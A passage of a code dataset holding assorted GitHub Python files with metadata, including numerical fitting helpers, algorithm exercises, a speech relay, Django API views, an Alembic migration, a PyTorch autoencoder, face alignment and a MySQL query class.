sw*Xr_dn[1,:]\r\n A = sw*np.array([np.ones((n,)),xx,xx**2])\r\n beta, residual,rank,s = np.linalg.lstsq(A.T,zz)\r\n rotijk[count,:]=np.array([rot[i],rot[j],rot[k]])\r\n coef[count,:]=beta\r\n res[count] = residual[0]\r\n count +=1\r\n \r\n ind = np.argmin(res)\r\n c = coef[ind,:]\r\n x0r = -c[1]/2/c[2]\r\n z0r = c[0]-c[1]**2/4/c[2]\r\n \r\n beta =c[2]\r\n a = -rotijk[ind,0]\r\n b = -rotijk[ind,1]\r\n c = -rotijk[ind,2]\r\n center=rotation_3D(np.array([[x0r],[0],[z0r]]),a,b,c).flatten()\r\n x0=center[0]\r\n y0=center[1]\r\n z0=center[2]\r\n B0 = 
np.array([x0,y0,z0,a,b,c,beta])\r\n return B0\r\n\r\ndef rotation(X,th):\r\n R = np.array([[np.cos(th),-np.sin(th)],[np.sin(th),np.cos(th)]])\r\n Xr = np.dot(R,X)\r\n return Xr\r\ndef rotation_3D(X,a,b,c):\r\n sa = np.sin(a)\r\n ca = np.cos(a)\r\n sb = np.sin(b)\r\n cb = np.cos(b)\r\n sc = np.sin(c)\r\n cc = np.cos(c)\r\n R = np.array([[cb*cc,ca*sc+sa*sb*cc,sa*sc-ca*sb*cc],[-cb*sc,ca*cc-sa*sb*sc,sa*cc+ca*sb*sc],[sb,-sa*cb,ca*cb]])\r\n Xr = np.dot(R,X)\r\n return Xr","repo_name":"wayinone/RRA","sub_path":"EM/fcn_fit.py","file_name":"fcn_fit.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14355399668","text":"from week_two.eight.question_eight import *\nimport unittest\n\n\nclass TestListInLists(unittest.TestCase):\n # Check lists in lists with no duplicate elements nad all of the same data type\n def test_list_in_list_no_duplicate_elements(self):\n first_list = [\"a\", \"b\", \"c\"]\n second_list = [\"d\", \"e\", \"f\", \"g\"]\n third_list = [\"h\", \"i\", \"j\", \"k\", \"l\"]\n self.assertEqual(list_function(first_list, second_list, third_list),\n ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l'])\n","repo_name":"ChristineWasike/data_structures","sub_path":"week_two/eight/unit_test_question_eight.py","file_name":"unit_test_question_eight.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74570103614","text":"class Solution:\n def countPaths(self, n: int, roads: List[List[int]]) -> int:\n\n #CREATE THE GRAPH\n graph = {i: [] for i in range(n)}\n\n for a, b, t in roads:\n graph[a].append((b, t))\n graph[b].append((a, t))\n\n #DJISKTA'S ALGORITHM\n\n #PQ TO HOLD VERTICES AND TIME\n pq = [(0, 0)]\n\n #STORE DISTANCES\n distances = [float('inf') for i in range(n)]\n\n #STORE WAYS TO REACH WITH LOWEST DISTANCE\n ways = [0 for i in range(n)]\n\n #FOR START NODE\n distances[0] = 0\n ways[0] = 1\n\n\n #ITERATE\n while pq:\n time, curr = heapq.heappop(pq)\n\n #IF GREATER\n if time > distances[curr]:\n continue\n\n\n for neigh, t in graph[curr]:\n newTime = time + t\n\n if newTime < distances[neigh]:\n #UPDATE DISTANCE AND WAYS\n distances[neigh] = newTime\n ways[neigh] = ways[curr]\n\n #ADD TO QUEUE\n heapq.heappush(pq, (newTime, neigh))\n\n elif newTime == distances[neigh]:\n ways[neigh] = (ways[neigh] + ways[curr]) % (10**9 + 7)\n\n return ways[n - 1]\n","repo_name":"yashpandey474/Competitive-Coding","sub_path":"LeetCode/Python/Graph/ways_to_reach_destination.py","file_name":"ways_to_reach_destination.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72137915134","text":"# Добавьте в пакет, созданный на семинаре шахматный модуль. 
Внутри него напишите код, решающий задачу о 8 ферзях.\n# Известно, что на доске 8×8 можно расставить 8 ферзей так, чтобы они не били друг друга.\n# Вам дана расстановка 8 ферзей на доске, определите, есть ли среди них пара бьющих друг друга.\n# Программа получает на вход восемь пар чисел, каждое число от 1 до 8 - координаты 8 ферзей.\n# Если ферзи не бьют друг друга верните истину, а если бьют - ложь.\n\n# Напишите функцию в шахматный модуль.\n# Используйте генератор случайных чисел для случайной расстановки ферзей в задаче выше.\n# Проверяйте различный случайные варианты и выведите 4 успешных расстановки.\n\nimport random\n\nSTART = 1\nFINISH = 8\n\n\ndef check_eight_queens(queens: list[(int, int)]) -> bool:\n if len(queens) != FINISH:\n return f\"Неверный ввод числа ферзей на доске.\"\n x = list(i[0] for i in queens)\n y = list(i[1] for i in queens)\n\n for i in range(len(queens)):\n for j in range(i + 1, len(queens)):\n if x[i] == x[j] or y[i] == y[j] or abs(x[i] - x[j]) == abs(y[i] - y[j]):\n return False\n return True\n\n\ndef _generate_random_queens_coordinates() -> list[(int, int)]:\n coordinates = []\n i = 0\n while i < FINISH:\n x, y = random.randint(START, FINISH), random.randint(START, FINISH)\n if x not in list(i[0] for i in coordinates) and (x, y) not in set(coordinates):\n coordinates.append((x, y))\n i += 1\n return sorted(coordinates)\n\n\ndef show_unique_solutions(combination: int) -> print:\n solutions = []\n count = 0\n while count < combination:\n temp = _generate_random_queens_coordinates()\n if check_eight_queens(temp) and temp not in solutions:\n print(temp)\n solutions.append(temp)\n count += 1\n","repo_name":"rimtimti/python_plus","sub_path":"sem6/eight_queens_chess.py","file_name":"eight_queens_chess.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1267470889","text":"import wave\n\nimport pyaudio\nimport pyttsx3\nimport speech_recognition as sr\n\nr = sr.Recognizer() # adding object for the recognizer\nengine = pyttsx3.init()\np = pyaudio.PyAudio()\n\ndef get_io_devices():\n\tp = pyaudio.PyAudio()\n\tinfo = p.get_host_api_info_by_index(0)\n\tnumdevices = info.get('deviceCount')\n\tinp = []\n\tout = []\n\tfor i in range(0, numdevices):\n\t\tif (p.get_device_info_by_host_api_device_index(0, i).get('maxInputChannels')) > 0:\n\t\t\tinp.append(p.get_device_info_by_host_api_device_index(0, i).get('name'))\n\tfor i in range(0, numdevices):\n\t\tif (p.get_device_info_by_host_api_device_index(0, i).get('maxOutputChannels')) > 0:\n\t\t\tout.append(p.get_device_info_by_host_api_device_index(0, i).get('name'))\n\treturn inp,out\n\nclass sttttts:\n\t\"\"\"\n\tThe class that does speech to text, to text to speech.\n\t\"\"\"\n\tdef __init__(self,input_index,output_index,output_index2):\n\t\tself.mic = sr.Microphone(device_index=input_index)\n\t\tself.output_index = output_index\n\t\tself.output_index2 = output_index2\n\tdef stt(self):\n\n\t\t# speech to text\n\t\twith self.mic as source: # making the system default mic as the input source\n\t\t\tprint(\"Say Anything:\")\n\t\t\taudio = r.listen(source=source) # listening to the input\n\t\t\tprint(f\"Stopped Listenning\")\n\t\t\ttry:\n\t\t\t\ttext = r.recognize_google(audio) # understanding the input\n\t\t\t\tprint(f'you said \"{text}\"')\n\t\t\texcept:\n\t\t\t\tprint(\"lol i didnt know what you said\")\n\t\t\t\treturn\n\t\t\treturn text\n\n\tdef make_stt_file(self,text):\n\t\t# text to 
speech\n\n\t\tengine.save_to_file(text, 'tts.wav')\n\t\tengine.runAndWait()\n\n\tdef tts(self):\n\t\t# playing to VB-Audio Cable Input\n\n\t\twf = wave.open(\"tts.wav\", 'rb')\n\t\tCHUNK = 182\n\t\toutput1 = p.open(\n\t\t\tformat=p.get_format_from_width(wf.getsampwidth()),\n\t\t\tchannels=wf.getnchannels(),\n\t\t\trate=wf.getframerate(),\n\t\t\toutput=True,\n\t\t\toutput_device_index=self.output_index\n\t\t)\n\t\tdata = wf.readframes(CHUNK)\n\t\tif(self.output_index2 is not None):\n\t\t\toutput2 = p.open(\n\t\t\t\tformat=p.get_format_from_width(wf.getsampwidth()),\n\t\t\t\tchannels=wf.getnchannels(),\n\t\t\t\trate=wf.getframerate(),\n\t\t\t\toutput=True,\n\t\t\t\toutput_device_index=self.output_index2\n\t\t\t)\n\n\t\t\twhile data != b'':\n\t\t\t\toutput1.write(data)\n\t\t\t\toutput2.write(data)\n\t\t\t\tdata = wf.readframes(CHUNK)\n\t\telse:\n\t\t\twhile data != b'':\n\t\t\t\toutput1.write(data)\n\t\t\t\tdata = wf.readframes(CHUNK)\n\ndef main(inp,out,out2 = None):\n\tio = sttttts(inp,out,out2)\n\ttext = io.stt()\n\tif text is None:\n\t\treturn\n\tio.make_stt_file(text)\n\tio.tts()\n\ndef repeat(out,out2):\n\tio = sttttts(0,out,out2)\n\tio.tts()\n\ndef say(out,out2,words):\n\tio = sttttts(0,out,out2)\n\tio.make_stt_file(words)\n\tio.tts()\n\nif __name__ == \"__main__\":\n\tmain(0,4)","repo_name":"sttttts/sttttts","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"26028130192","text":"import textdistance\nfrom datetime import datetime\nfrom pymongo import MongoClient\nimport config\nimport re\nfrom unidecode import unidecode\n\nclient = MongoClient(\"localhost\", 27017)\ndb = client.market_database\nlist_of_matches = []\n\nserch_index_collection = db[\"product_catalog\"]\nserch_index_doc_list = serch_index_collection.find()\n\n\ndef get_tests_lists():\n pipoca_list = []\n leite_list = []\n veja_list = []\n detergente_list = []\n arroz_list = []\n\n for doc in serch_index_doc_list:\n if \"leite\" in doc[\"name\"]:\n leite_list.append(doc)\n if \"pipoca\" in doc[\"name\"]:\n pipoca_list.append(doc)\n if \"veja\" in doc[\"name\"]:\n veja_list.append(doc)\n if \"detergente\" in doc[\"name\"]:\n detergente_list.append(doc)\n if \"arroz\" in doc[\"name\"]:\n arroz_list.append(doc)\n\n return [pipoca_list, leite_list, veja_list, detergente_list, arroz_list]\n\n\ndef get_docs_with_popular_products(history_object_doc):\n leite_list_history = []\n amaciante_list_history = []\n cafe_list_history = []\n maionese_list_history = []\n\n for i in history_object_doc:\n if \"leite\" in i[\"name\"]:\n leite_list_history.append(i)\n if \"amaciante\" in i[\"name\"]:\n amaciante_list_history.append(i)\n if \"cafe\" in i[\"name\"]:\n cafe_list_history.append(i)\n if \"maionese\" in i[\"name\"]:\n maionese_list_history.append(i)\n\n return [leite_list_history, amaciante_list_history, cafe_list_history, maionese_list_history]\n\n\ndef test_products():\n products = [\n {\n \"id\": \"62b1231e72ab3382a5958b7b\",\n \"name\": \"amaciante de roupas concentrado downy naturals coco e menta 450ml\"\n },\n {\n \"id\": '62b1231e72ab3382a5958383',\n \"name\": 'leite tirol integral 1 litro'\n },\n {\n \"id\": '62b1231e72ab3382a595895e',\n \"name\": 'maionese hemmer tradicional 930g'\n },\n {\n \"id\": '62b1231e72ab3382a5958b52',\n \"name\": 'amaciante para roupas concentrado downy brisa de verao 1,5 litro'\n },\n {\n \"id\": '62b1231e72ab3382a5958386',\n \"name\": 'cafe melitta 
tradicional vacuo 500g'\n },\n\n ]\n\n return products","repo_name":"dc-diogo/product_integrator","sub_path":"app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9955425757","text":"# Minion game\n\nword = 'BANANA'\n\nvowel = ['A', 'E', 'I', 'O', 'U']\n\nnum_vowel = 0\nvowel_list = []\nconsonant_list = []\n\nfor item in word:\n vowel_found = False\n for idx, vow in enumerate(vowel):\n if item == vow:\n num_vowel += 1\n vowel_list.append(item)\n vowel_found = True\n break\n if not(vowel_found):\n consonant_list.append(item)\n\n\nprint(vowel_list, consonant_list)\nprint(num_vowel)\n\nvowel_set = sorted(set(vowel_list))\nconsonant_set = sorted(set(consonant_list))\nprint(vowel_set, consonant_set)\n\nprint(vowel_list.count('A'))","repo_name":"ameetmund/python","sub_path":"dev_20210828.py","file_name":"dev_20210828.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"37506771685","text":"\"\"\"empty message\n\nRevision ID: 71f85978d86a\nRevises: ae76d1bd8ee0\nCreate Date: 2022-12-11 11:32:57.506549\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '71f85978d86a'\ndown_revision = 'ae76d1bd8ee0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('chats',\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('recent_snap', sa.String(length=50), nullable=True),\n sa.Column('top3_snappers', sa.String(length=100), nullable=True),\n sa.Column('most_received', sa.Text(), nullable=True),\n sa.Column('total_snaps_sent', sa.Integer(), nullable=True),\n sa.Column('total_snaps_received', sa.Integer(), nullable=True),\n sa.Column('total_snaps_saved', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('user_id')\n )\n with op.batch_alter_table('users', schema=None) as batch_op:\n batch_op.drop_column('recent_snap')\n batch_op.drop_column('total_snaps_sent')\n batch_op.drop_column('total_snaps_saved')\n batch_op.drop_column('most_received')\n batch_op.drop_column('top3_snappers')\n batch_op.drop_column('total_snaps_received')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n with op.batch_alter_table('users', schema=None) as batch_op:\n batch_op.add_column(sa.Column('total_snaps_received', sa.INTEGER(), nullable=True))\n batch_op.add_column(sa.Column('top3_snappers', sa.VARCHAR(length=50), nullable=True))\n batch_op.add_column(sa.Column('most_received', sa.TEXT(), nullable=True))\n batch_op.add_column(sa.Column('total_snaps_saved', sa.INTEGER(), nullable=True))\n batch_op.add_column(sa.Column('total_snaps_sent', sa.INTEGER(), nullable=True))\n batch_op.add_column(sa.Column('recent_snap', sa.VARCHAR(length=50), nullable=True))\n\n op.drop_table('chats')\n # ### end Alembic commands ###\n","repo_name":"griffinlaszlo/snata","sub_path":"migrations/versions/71f85978d86a_.py","file_name":"71f85978d86a_.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36106244620","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nclass Made(nn.Module):\n def __init__(self, input_h = 28, input_w = 28, hidden_size = 1000, layer_size = 2, random_order = False, mask_num = 1):\n super(Made, self).__init__()\n self.input_h = input_h\n self.input_w = input_w\n self.hidden_size = hidden_size\n self.layer_size = layer_size\n self.random_order = random_order\n self.mask_num = mask_num\n self.order = {}\n if self.random_order:\n for i in range(self.mask_num):\n self.order[i] = torch.randperm(self.input_h * self.input_w)\n else:\n self.order[0] = torch.Tensor([i for i in range(self.input_h * self.input_w)])\n\n self.layer_num = [self.input_h * self.input_w]\n for j in range(self.layer_size):\n self.layer_num.append(self.hidden_size)\n self.layer_num.append(self.input_h * self.input_w)\n self.net = []\n for n1, n2 in zip(self.layer_num, self.layer_num[1:]):\n self.net.append(MadeLayer(n1, n2))\n self.net.append(nn.ReLU())\n self.net = nn.ModuleList(self.net[:-1])\n self.net = nn.Sequential(*self.net)\n self.update_mask()\n self.weight = nn.Parameter(torch.Tensor(self.input_h * self.input_w, self.input_h * self.input_w).normal_())\n self.register_buffer('maska', torch.tril(torch.ones(self.input_h * self.input_w, self.input_h * self.input_w), -1))\n def update_mask(self):\n m = {}\n if self.random_order:\n m[0] = self.order[torch.randint(0, self.mask_num, (1,)).item()]\n else:\n m[0] = self.order[0]\n for l in range(1, self.layer_size +1):\n m[l] = torch.randint(m[l-1].min().int().item(), self.input_h * self.input_w - 1, size = (self.hidden_size,))\n self.mask = [m[l-1][:, None].long() <= m[l][None, :].long() for l in range(1, self.layer_size + 1)]\n self.mask.append(m[self.layer_size][:, None].long() < m[0][None, :].long())\n layers = [l for l in self.net.modules() if isinstance(l, MadeLayer)]\n for l, m in zip(layers, self.mask):\n l.set_mask(m)\n\n def forward(self, x):\n out = self.net(x)\n a = F.linear(x.view(-1, self.input_h * self.input_w), self.weight * self.maska)\n x = F.sigmoid(out + a)\n x = x.view(-1, 1, self.input_h, self.input_w)\n return x\n\nclass MadeLayer(nn.Module):\n def __init__(self, input_l, output_l):\n super(MadeLayer, self).__init__()\n self.input_l = input_l\n self.output_l = output_l\n self.weight = nn.Parameter(torch.Tensor(output_l, input_l).normal_())\n self.bias = nn.Parameter(torch.Tensor(output_l).normal_())\n self.register_buffer('mask', torch.ones(output_l, input_l))\n def set_mask(self, mask):\n self.mask.data.copy_(mask.float().t())\n\n def forward(self, x):\n x = x.view(-1, self.input_l)\n x = F.linear(x, self.mask * 
self.weight, self.bias)\n return x\n","repo_name":"Lyusungwon/generative_models_pytorch","sub_path":"made/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"79"} +{"seq_id":"15706360782","text":"import cv2\nimport numpy as np\nfrom mtcnn.mtcnn import MTCNN\n\nINPUT_IMAGE = 'ziyu.jpg'\nOUTPUT_IMAGE = 'output.png'\ndetector = MTCNN(steps_threshold=[0.0, 0.0, 0.0])\n\ndef landmarks(img):\n faces = detector.detect_faces(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n face = max(faces, key=lambda x: x['confidence'])\n return face['keypoints']\n\ndef affineMatrix(lmks, scale=2.5):\n nose = np.array(lmks['nose'], dtype=np.float32)\n left_eye = np.array(lmks['left_eye'], dtype=np.float32)\n right_eye = np.array(lmks['right_eye'], dtype=np.float32)\n eye_width = right_eye - left_eye\n angle = np.arctan2(eye_width[1], eye_width[0])\n center = nose\n alpha = np.cos(angle)\n beta = np.sin(angle)\n w = np.sqrt(np.sum(eye_width**2)) * scale\n m = [[alpha, beta, -alpha * center[0] - beta * center[1] + w * 0.5],\n [-beta, alpha, beta * center[0] - alpha * center[1] + w * 0.5]]\n return np.array(m), (int(w), int(w))\n\nif __name__ == '__main__':\n img = cv2.imread(INPUT_IMAGE)\n mat, size = affineMatrix(landmarks(img))\n cv2.imwrite(OUTPUT_IMAGE, cv2.warpAffine(img, mat, size))\n","repo_name":"YangRice/mtcnn_face_alignment","sub_path":"face_alignment.py","file_name":"face_alignment.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"38498380914","text":"import sys\ninput = sys.stdin.readline\n\nG = int(input())\nP = int(input())\n\ngates = [False] * G\ncnt = 0\nfor _ in range(P):\n num = int(input())\n\n exist = False\n for i in range(num-1 , -1, -1):\n if not gates[i]:\n gates[i] = True\n exist = True\n cnt += 1\n break\n\n if not exist:\n break\n\nprint(cnt)","repo_name":"SangjinH/algorithm","sub_path":"baekjoon/greedy/10775_ori.py","file_name":"10775_ori.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"39481083814","text":"from django.http import HttpResponse\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom APIs.serializers import ProjectSerializer, ProfileSerializer\nfrom project.models import Project, Tag\nfrom users.models import Profile\n\n\ndef getRoutes(request):\n return HttpResponse(\"Hello world\")\n\n\n@api_view(['GET', 'POST'])\ndef projects(request):\n projectsObjs = Project.objects.all()\n serializer = ProjectSerializer(projectsObjs, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET', 'POST'])\ndef project(request, projectId):\n projectsObj = Project.objects.get(id=projectId)\n serializer = ProjectSerializer(projectsObj, many=False)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef users(request):\n profiles = Profile.objects.all()\n serializer = ProfileSerializer(profiles, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET', 'POST', 'PUT'])\n@permission_classes([IsAuthenticated])\ndef voteProject(request, pk):\n projectObj = Project.objects.get(id=pk)\n\n review, created = projectObj.review_set.get_or_create(\n owner=request.user.profile)\n review.value = request.data.get('vote')\n review.save()\n 
projectObj.getVoteCount\n\n return Response({'result': \"you have {vote}voted the {project} project successfully\".format(vote=request.data.get('vote'), project=projectObj)})\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef createTag(request):\n tagObj = Tag.objects.create(name=request.data.get('tagName'))\n tagObj.save()\n return Response({'result': \"{tagObj} created successfully\".format(tagObj=tagObj)})\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef createProject(request):\n\n return Response(\"Hello world\")\n","repo_name":"vinayKumarReddy-mangalampenta/pythonProject","sub_path":"APIs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23660733661","text":"from Querys.query import Query\nimport Resources.UsuarioSubtema.querys_constants as qc\nimport Utils.messages_constants as mc\nfrom pymysql import Error\n\n\nclass UsuarioSubtemaQuery(Query):\n\n def update_porcentage(self, usuario_subtema):\n count = None\n id_tema = None\n id_asignatura = None\n try:\n with self.get_cursor() as cursor:\n exist = self.insert_usuario_subtema(cursor, usuario_subtema)\n if not exist:\n count = self.get_count(\n cursor, tipo=\"subtema\", id=usuario_subtema[1])\n id_tema = count[\"id\"]\n total_subtema = count[\"numero\"]\n porcentaje = self.set_porcentaje_tema(\n cursor, id_tema=id_tema, id_usuario=usuario_subtema[0], total=total_subtema)\n count = self.get_count(cursor, tipo=\"tema\", id=id_tema)\n id_asignatura = count[\"id\"]\n total_tema = count[\"numero\"]\n self.set_porcentaje_asignatura(\n cursor, id_asignatura=id_asignatura, id_usuario=usuario_subtema[0], total=total_tema, porcentaje=porcentaje)\n self.get_connection().commit()\n return {'mensaje': mc.PORCENTAJE_UPDATED}, 201\n else:\n return {'mensaje': mc.OK}, 200\n except Error as e:\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\n self.get_connection().rollback()\n return {'error': mc.DB_ERROR}, 500\n finally:\n cursor.close()\n\n def insert_usuario_subtema(self, cursor, usuario_subtema):\n count = self.exists(\n cursor, tipo=\"subtema\", id=usuario_subtema[1], id_usuario=usuario_subtema[0])\n if count[\"numero\"] is 0:\n query = self.get_insert_query(\n qc.USUARIO_SUBTEMA_COLUMNS, qc.USUARIO_SUBTEMA_TABLE)\n cursor.execute(query, usuario_subtema)\n return False\n else:\n return True\n\n def exists(self, cursor, **kwargs):\n if kwargs[\"tipo\"] is \"subtema\":\n cursor.execute(qc.USUARIO_SUBTEMA_EXIST, [\n kwargs[\"id\"], kwargs[\"id_usuario\"]])\n elif kwargs[\"tipo\"] is \"tema\":\n cursor.execute(qc.USUARIO_TEMA_EXIST, [\n kwargs[\"id\"], kwargs[\"id_usuario\"]])\n else:\n cursor.execute(qc.USUARIO_ASIGNATURA_EXIST, [\n kwargs[\"id\"], kwargs[\"id_usuario\"]])\n return cursor.fetchall()[0]\n\n def get_count(self, cursor, **kwargs):\n if \"id_usuario\" not in kwargs:\n if kwargs[\"tipo\"] is \"subtema\":\n cursor.execute(qc.SUBTEMA_COUNT, [kwargs[\"id\"]])\n else:\n cursor.execute(qc.TEMA_COUNT, [kwargs[\"id\"]])\n else:\n if kwargs[\"tipo\"] is \"subtema\":\n cursor.execute(qc.USUARIO_SUBTEMA_COUNT, [\n kwargs[\"id\"], kwargs[\"id_usuario\"]])\n else:\n cursor.execute(qc.USUARIO_TEMA_COUNT, [\n kwargs[\"id\"], kwargs[\"id_usuario\"]])\n return cursor.fetchall()[0]\n\n def set_porcentaje_tema(self, cursor, **kwargs):\n count = self.exists(\n cursor, tipo=\"tema\", id=kwargs[\"id_tema\"], id_usuario=kwargs[\"id_usuario\"])\n if count[\"numero\"] is 0:\n 
porcentaje = (1 / kwargs[\"total\"]) * 100\n query = self.get_insert_query(\n qc.USUARIO_TEMA_COLUMNS, qc.USUARIO_TEMA_TABLE)\n cursor.execute(\n query, [kwargs[\"id_usuario\"], kwargs[\"id_tema\"], int(porcentaje)])\n return porcentaje\n else:\n count = self.get_count(\n cursor, tipo=\"subtema\", id=kwargs[\"id_tema\"], id_usuario=kwargs[\"id_usuario\"])\n porcentaje = (count[\"numero\"] / kwargs[\"total\"]) * 100\n query = self.get_update_query(\n qc.PORCENTAJE_COLUMN, qc.USUARIO_TEMA_TABLE, qc.USUARIO_TEMA_WHERE_COLUMN)\n cursor.execute(\n query, [int(porcentaje), kwargs[\"id_usuario\"], kwargs[\"id_tema\"]])\n return porcentaje\n\n def set_porcentaje_asignatura(self, cursor, **kwargs):\n count = self.exists(\n cursor, tipo=\"asignatura\", id=kwargs[\"id_asignatura\"], id_usuario=kwargs[\"id_usuario\"])\n if count[\"numero\"] is 0:\n porcentaje = (1 / kwargs[\"total\"]) * 100\n query = self.get_insert_query(\n qc.USUARIO_ASIGNATURA_COLUMNS, qc.USUARIO_ASIGNATURA_TABLE)\n cursor.execute(\n query, [kwargs[\"id_usuario\"], kwargs[\"id_asignatura\"], int(porcentaje)])\n elif count[\"numero\"] is not 0 and kwargs[\"porcentaje\"] == 100.0:\n count = self.get_count(\n cursor, tipo=\"tema\", id=kwargs[\"id_asignatura\"], id_usuario=kwargs[\"id_usuario\"])\n porcentaje = (count[\"numero\"] / kwargs[\"total\"]) * 100\n query = self.get_update_query(\n qc.PORCENTAJE_COLUMN, qc.USUARIO_ASIGNATURA_TABLE, qc.USUARIO_ASIGNATURA_WHERE_COLUMN)\n cursor.execute(\n query, [int(porcentaje), kwargs[\"id_usuario\"], kwargs[\"id_asignatura\"]])\n","repo_name":"grupo-2-diseno-web/flask-cachimbogo","sub_path":"Resources/UsuarioSubtema/usuario_subtema_query.py","file_name":"usuario_subtema_query.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11273299794","text":"\"\"\"\nGiven two strings. 
Using operations delete, insert, replace change second string to be equal to the first string\ntable\ntble\n\n\n\"\"\"\n\n\n# top-down approach\ndef num_of_operations(s1: str, s2: str, ind1: int, ind2: int, meta: dict = None) -> int:\n if meta is None:\n meta = {}\n if ind1 == len(s1):\n return len(s2) - ind2\n if ind2 == len(s2):\n return len(s1) - ind1\n if s1[ind1] == s2[ind2]:\n return num_of_operations(s1, s2, ind1 + 1, ind2 + 1, meta)\n\n meta_key = str(ind1) + str(ind2)\n if meta_key not in meta.keys():\n del_char = num_of_operations(s1, s2, ind1, ind2 + 1, meta)\n add_char = num_of_operations(s1, s2, ind1 + 1, ind2, meta)\n rep_char = num_of_operations(s1, s2, ind1 + 1, ind2 + 1, meta)\n meta[meta_key] = 1 + min(del_char, add_char, rep_char)\n\n return meta[meta_key]\n\n\n# bottom-up approach\ndef findMinOperationBU(s1, s2, tempDict):\n for i1 in range(len(s1) + 1):\n dictKey = str(i1) + '0'\n tempDict[dictKey] = i1\n for i2 in range(len(s2) + 1):\n dictKey = '0' + str(i2)\n tempDict[dictKey] = i2\n\n for i1 in range(1, len(s1) + 1):\n for i2 in range(1, len(s2) + 1):\n if s1[i1 - 1] == s2[i2 - 1]:\n dictKey = str(i1) + str(i2)\n dictKey1 = str(i1 - 1) + str(i2 - 1)\n tempDict[dictKey] = tempDict[dictKey1]\n else:\n dictKey = str(i1) + str(i2)\n dictKeyD = str(i1 - 1) + str(i2)\n dictKeyI = str(i1) + str(i2 - 1)\n dictKeyR = str(i1 - 1) + str(i2 - 1)\n tempDict[dictKey] = 1 + min(tempDict[dictKeyD], min(tempDict[dictKeyI], tempDict[dictKeyR]))\n dictKey = str(len(s1)) + str(len(s2))\n return tempDict[dictKey]\n\n\n# unfinished\ndef convert(s1: str, s2: str):\n meta = {}\n i = 0\n j = 0\n\n meta_key = str(i) + str(j)\n if s1[i] == s2[j]:\n meta[meta_key] = 0\n else:\n\n if meta_key not in meta.keys():\n add_key = str(i) + str(j - 1)\n del_key = str(i - 1) + str(j)\n rep_key = str(i - 1) + str(j - 1)\n meta[meta_key] = 1 + min(meta[del_key], meta[add_key], meta[rep_key])\n\n\nstr1 = \"table\"\nstr2 = \"tblred\"\nprint(num_of_operations(str1, str2, 0, 0))\nmeta = {}\nfindMinOperationBU(str1, str2, meta)\nprint(meta)\n","repo_name":"varvara-vlasyuk/AlgorithmsAndDataStructures","sub_path":"dynamic_programming/convert_string.py","file_name":"convert_string.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17536962197","text":"'''\nAuthor: Mohammed Rashid Chowdhury\nemail: \nScript name: another_slicer.py\n'''\n\n# I implemented the slicing functionality from scratch because the library that i was using in slicer.py (image_slicer) doesn't work as expected.\n\nimport os\nfrom PIL import Image,ImageFile\nimport numpy as np\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\noutput_directory = \"/u1/rashid/Data/predictive_flower_counter/splited_images\"\ninput_directory = \"/discus/\"\n\n# This function slices a given image into user given number of tiles.\ndef make_Tiles(img_path,number_of_tiles_tuple,directory):\n img = Image.open(img_path)\n # print(img.size)\n\n # Assuming each input image which will be fed to Alexnet has an dimension of 224*224\n input_image_size = (224, 224)\n\n # Getting image name\n # if(hasattr(img,'filename')):\n # print(img.filename)\n # save_as = 'cropped_'+img.filename+'.jpg'\n\n # Check if the given directory exists, if not create new directory.\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n # Get the 